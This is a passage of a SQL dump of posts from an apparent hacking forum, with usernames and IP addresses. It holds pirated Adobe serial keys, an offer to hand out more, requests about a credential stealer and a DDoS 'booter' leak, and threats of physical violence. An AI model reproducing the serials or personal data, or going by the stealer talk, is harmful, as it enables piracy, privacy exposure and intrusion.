('3214', '488', '2355', '8', 'RE: What are you listening to?', '0', '1', 't3h jok3r', '1349232199', 'I\'m listening to something no one can guess. [spoiler] I\'m listening to my mind and doing what it\'s telling me to do. [/spoiler]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f3c15e9de5d4e3ec57255b44649ca5c7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3215', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1349232327', 'http://mods.mybb.com/view/hide-links-to-guests-for-14', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e7f11d0103941eecab546e2a221d7f03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3216', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '82', 'iTzIpod', '1349232697', 'You made 38 posts in a couple days. That\'s good.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df0810086603ab5f69a6e142cb2a93f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3217', '649', '3213', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349232809', '[quote=\'??????????¢™\' pid=\'3213\' dateline=\'1349232034\'] Hey, You forgot to add me in it. Awwwww man. [/quote] Lol that\'s because I thought you considered LH your own :(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '078add4e2ab470a4c5af694eb73e7cc2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3218', '649', '3217', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '3', '??????????¢™', '1349232950', '[quote=\'t3h jok3r\' pid=\'3217\' dateline=\'1349232809\'] [quote=\'??????????¢™\' pid=\'3213\' dateline=\'1349232034\'] Hey, You forgot to add me in it. Awwwww man. [/quote] Lol that\'s because I thought you considered LH your own :( [/quote] I do man, I own LH. This is my forum. LOL', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', 'fe8a174b4dc8aa27a3099cab45a2dbf9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3219', '466', '3204', '13', 'RE: How to BruteForce a VPS!', '0', '5', 'Timmy', '1349233348', '[quote=\'Kasual\' pid=\'3204\' dateline=\'1349220221\'] You stole my tutorial off of Ubers. [/quote] You could have contacted me directly anyways i gave you credits.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f10a15a4f4db8eba9c486884f9197ffd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3220', '190', '665', '56', 'RE: Copy and paste game', '0', '5', 'Timmy', '1349233964', 'http://community.mybb.com/thread-108595.html', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6c4ef3f0c55f0935dc97c4b0b9a8f41d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3221', '649', '3218', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '1', 't3h jok3r', '1349234104', '[quote=\'??????????¢™\' pid=\'3218\' dateline=\'1349232950\'] [quote=\'t3h jok3r\' pid=\'3217\' dateline=\'1349232809\'] [quote=\'??????????¢™\' pid=\'3213\' dateline=\'1349232034\'] Hey, You forgot to add me in it. Awwwww man. [/quote] Lol that\'s because I thought you considered LH your own :( [/quote] I do man, I own LH. This is my forum. LOL [/quote] So then you don\'t need to be appreciated for treating something yours and trying to keep something that belongs to you safe and healthy(active).', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7aff528100ac6bf698dbb51ca6837215', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3222', '653', '0', '43', 'Photoshop CS5 Serial Keys', '0', '1', 't3h jok3r', '1349234647', 'I have found some PS CS5 serials online so here they are. [code] 1330-1270-2109-5153-8837-9231? 1188-1702-9219-4234-2059-4581 1330-1281-8916-6015-7348-5124 1325-1558-5864-4422-1094-1126 1325-0621-9125-0765-3648-0614 1325-0365-5929-6118-8817-8422 1325-0150-1163-7532-1626-3430 1325-0178-1927-9019-0123-2254 1325-0702-3693-1544-9166-3515 1325-0549-2240-0071-3409-1342 [/code] P.S: They might not work but there\'s nothing wrong in giving it a try.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b85bad05d76fdfd60868adfd398cefa8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3223', '514', '2551', '9', 'RE: How to make serious money', '0', '8', 'spacefish36', '1349234808', 'Nice method. Thanks for sharing', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5323ae61bf9d7facf0c0a51b49421d82', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3225', '546', '2745', '15', 'RE: OverTheRainbow\'s ProxyScanner v1.2', '0', '8', 'spacefish36', '1349234998', 'That\'s cool thanks for this.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bbb3030000adce359d3a9620366fb9f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3226', '654', '0', '9', 'Make money typing captchas', '0', '8', 'spacefish36', '1349235229', 'Found a way to make money online typing captcha codes. The site is called MegaTypers and you can only register using an Affiliate Code which I will provide here.If you miss 5 within 15 minutes, you are banned for 48 hours. Code : 29B1 [align=center][img]http://2.bp.blogspot.com/-JU5CKCYc3CY/Tye_xh5e4PI/AAAAAAAAAms/CX8vju7WbFA/s320/MEGATYPERS-CAPTCHA-WORK.jpg[/img] [url=http://www.megatypers.com/register][size=large]Register Here[/size][/url][/align] Found this from a blog called [url=http://bestmonetizingtechniques2012.blogspot.com/2012/04/make-money-typing-captchas.html]best monetizing techniques[/url].', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '17e815fb6cb4bd2fdd16bd54cc968408', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3227', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349235386', 'Where do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c0fe837e1be0d3c52c667ddadb2e85c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3228', '652', '3227', '7', 'RE: Being CyberBullied', '0', '3', '??????????¢™', '1349235960', '[quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\'] Where do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that.. [/quote] You live in ontario? I live in san bernardino.', '75.22.59.99', '1259748195', '1', '0', '0', '0', '1', '788fb3f2cfd00fb6f8047d0fe12af3c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3229', '652', '3228', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349236617', '[quote=\'??????????¢™\' pid=\'3228\' dateline=\'1349235960\'] [quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\'] Where do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that.. [/quote] You live in ontario? I live in san bernardino. [/quote] Ontario canada aha. Me and ipod are canadians eh?', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '47c42fa73529ac02310695b082a0e000', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3230', '652', '3229', '7', 'RE: Being CyberBullied', '0', '2', 'Apathy', '1349238233', '[quote=\'NXK\' pid=\'3229\' dateline=\'1349236617\'] [quote=\'??????????¢™\' pid=\'3228\' dateline=\'1349235960\'] [quote=\'NXK\' pid=\'3227\' dateline=\'1349235386\'] Where do you live, If you\'re in ontario Ill just come to your school with my friends and beat this kid up. how about that.. [/quote] You live in ontario? I live in san bernardino. [/quote] Ontario canada aha. Me and ipod are canadians eh? [/quote] Canadian here as well. Where in Ontario? :o', '173.206.128.201', '-1378975543', '0', '0', '0', '0', '1', 'c514e24a752ab2f82b0ba59de6b28cbc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3231', '488', '2355', '8', 'RE: What are you listening to?', '0', '2', 'Apathy', '1349238391', 'Nit anything ATM but probably Hail the villain - Runaway soon. Sick song not my usual genre though. I like edm classic rock , rock , pop, rap etc... All types.', '173.206.128.201', '-1378975543', '0', '0', '0', '0', '1', '428d4821cf2ca9bdd0eb3bc2d3498e67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3232', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349250266', 'Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, webmaster@l33thacking.net and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'a2607a0d9ec108bd4ab35799eb8efc80', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3233', '637', '3203', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349252684', '[quote=\'iTzIpod\' pid=\'3203\' dateline=\'1349218508\'] Terribly sorry though dude. :/ [/quote] no worries bro :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0e789dccd00b58d2ba6b1d6c01dd37a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3234', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349263755', 'Alrready posted this thread in the Monetizing Section.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '18957ae3fb171a9590b4bef062db50ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3235', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349263793', 'Brampton? :3 I doubt NXK lives here.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fba32714ed844b9f89d0b06ea2ce6281', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3236', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349264157', 'Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, webmaster@l33thacking.net and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Lool Anonymous. We copied the same thing.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b131100b3d347ffbecbf90ad64cf87e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3237', '488', '2355', '8', 'RE: What are you listening to?', '0', '82', 'iTzIpod', '1349264202', 'Skrillex - Cinema :p My playlist is the best ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d201c6b6d99713d1c267bec071409ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3238', '514', '2551', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1349264265', 'You\'re welcome spacefish36.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f8e4d29340c445e80ffda0b5a442103', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3239', '653', '3222', '43', 'RE: Photoshop CS5 Serial Keys', '0', '82', 'iTzIpod', '1349264295', 'Nice share t3h jok3r. Although I won\'t need it. Good luck to whoever is going to use the code.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '77eb04c602015cd47af161a2511871b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3240', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349264337', '29 is the next number.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '33947e2f0cc7c5ff46e4c4b94b71cdc5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3241', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349265281', 'I live in the GTA, about 40 mins outside of brampton.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '83d3062261082d3a02cfb549e5c112fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3242', '253', '1106', '56', 'RE: Count to 200', '0', '62', 'R?????zo?', '1349265379', '30. keep them coming guys', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cdbdbe7b6a7a30ad4e85d3daa6bb8d35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3243', '652', '3235', '7', 'RE: Being CyberBullied', '0', '2', 'Apathy', '1349265639', '[quote=\'iTzIpod\' pid=\'3235\' dateline=\'1349263793\'] Brampton? :3 I doubt NXK lives here. [/quote] :o I can like go visit you on the weekend.', '173.206.128.201', '-1378975543', '0', '0', '0', '0', '1', '03847075984beedc48e27a575714430e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3244', '534', '2670', '23', 'RE: Manually Removing Viruses Through System Registry', '0', '205', 'mothered', '1349267904', 'Looking forward to viewing some more of your guides. Cheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0643fda30cadd05d1380a52303c708a7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3245', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '205', 'mothered', '1349268119', 'I\'m from L33thackers, and It went down around a couple of months ago. I like this forum better. It\'s more relaxing, and the members are quite friendly to get along with.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '934605ab40bc2e87a913154e1ed7bd60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3246', '634', '3075', '7', 'RE: Depressed', '0', '205', 'mothered', '1349268291', 'Are you seeking any clinical treatment? It can make all the difference. I do hope the clouds pass over, and the sun starts shinning for you once again.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '904f6d64cb8321dc2530bb02197a211f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3247', '649', '3179', '3', 'RE: Thanks to the following and L33THacking Monthly Stats', '0', '205', 'mothered', '1349268524', 'That\'s awesome guys, let\'s keep the activity happening, and spread the word on this lovely forum.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '590cb076153f9b8d35c3bc25f900e519', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3248', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '205', 'mothered', '1349268784', 'That\'s absolutely correct. Google\'s bots copy almost everything available on the net. They even copy sensitive Information, like usernames, passwords, and even credit card numbers. That\'s why searches via using Dorks, provide so many results.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e382e7a3b2a94b6f2f5c2d1dc8262f09', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3249', '622', '3013', '42', 'RE: Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '205', 'mothered', '1349269033', 'Isn\'t he the one who has since declared himself bankrupt? The Pirate Bay has been down for a few days now (still Is at the time of this post). Google It and read the news. It\'s quite Interesting.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b72bfa4e20ab9ffb4534bf4067200d0c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3250', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349273809', 'Coming to beat this kid up on the weekend don\'t worry ipod me and apathy got hm. ;)', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', 'bca242ed53c48ed8f026790ecabdb226', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3251', '652', '3206', '7', 'RE: Being CyberBullied', '0', '100', '??zg???g????61', '1349284169', 'Lol so a recap- you all just gave out where you live on a public hacking forum ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'e0cabc1c0c297424a290c88a9be67797', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3252', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '100', '??zg???g????61', '1349284335', 'I have a picture about this ;D here- [img]http://i.imgur.com/lHshj.png[/img]', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '3806dbfb66fdfee39ff42fc59e3359e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3253', '655', '0', '43', 'ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '100', '??zg???g????61', '1349284820', 'Hey everyone, I just wanted to offer a new service of mine. I\'ll give anyone that PM\'s me, any CS5 or CS4 serial keys for any adobe product. I don\'t have a serials for all CS4 products- so keep that in mind. Yep so PM me with the adobe product you want and I\'ll send you a serial ;D', '96.237.179.21', '1626190613', '1', '0', '100', '1349373898', '1', '6c1480c64d3345809e20342ce1e8174e', '0', '1349373898'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3335', '650', '3193', '61', 'RE: [LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '100', '??zg???g????61', '1349373984', 'No problem ;D I <3 L33t Hacking', '66.30.110.193', '1109290689', '1', '0', '0', '0', '1', 'f73f39864083c397519d7d298335c0e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3254', '589', '2861', '15', 'RE: Crime24 Stealer', '0', '100', '??zg???g????61', '1349285261', 'Neon, you think you could set a server up for me? I\'ll give you the FTP info, if you could that would be amazing. I\'m on a mac so I can\'t do it myself. [hr] PM me if thats a yes ;DDDD', '96.237.179.21', '1626190613', '1', '0', '100', '1349285706', '1', 'ca8eb1ceb0f211e31cbe50b0253192cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3255', '190', '665', '56', 'RE: Copy and paste game', '0', '62', 'R?????zo?', '1349290620', 'Has anyone been on the phone to Green Day today? September has ended so should probably wake them up. just thought it was funny when I saw it from a friend on facebook, decided to share :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '143313939d2a3e2febff18807145a601', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3256', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349292239', '31. Like an iPod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2abbfa2d9aa1ca7cff5f6637b2fe3e7a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3257', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349292488', 'Not really where I live.. Like that\'s my city. But not my house or anything.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59f6f6150346d6143efdaae54e5b4d8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3258', '652', '3206', '7', 'RE: Being CyberBullied', '0', '61', 'NXK', '1349296563', '....? I said the GTA, which stands for greater toronto area.. Know one gave away anything. And like you said it\'s a publiic hacking forum.. it\'s not like we\'re a secret carding forum..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd340e3c60cb60b6bce6ce4256c9d47a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3259', '652', '3206', '7', 'RE: Being CyberBullied', '0', '100', '??zg???g????61', '1349297086', 'xD well if someone was looking for you, you just did them the giant favor of narrowing it down a LOT. True its not specific but whatever xD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a1a536c24019c2ba66981a1bda2cffe3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3260', '652', '3206', '7', 'RE: Being CyberBullied', '0', '82', 'iTzIpod', '1349297819', 'Oh well. I wanna kick this guy\'s ass. He probably wants to suck my dick. So.. I don\'t care right now..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 